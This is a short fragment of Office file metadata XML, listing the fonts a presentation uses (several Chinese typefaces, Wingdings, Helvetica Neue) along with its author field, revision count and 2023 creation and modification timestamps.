      <vt:lpstr>阿里巴巴普惠体 R</vt:lpstr>
      <vt:lpstr>Wingdings</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Times New Roman</vt:lpstr>
      <vt:lpstr>思源黑体 CN Heavy</vt:lpstr>
      <vt:lpstr>思源黑体 CN Normal</vt:lpstr>
      <vt:lpstr>Helvetica Neue</vt:lpstr>
      <vt:lpstr>宋体-简</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>等线</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zhong</cp:lastModifiedBy>
  <cp:revision>82</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-14T03:10:28Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-14T03:10:28Z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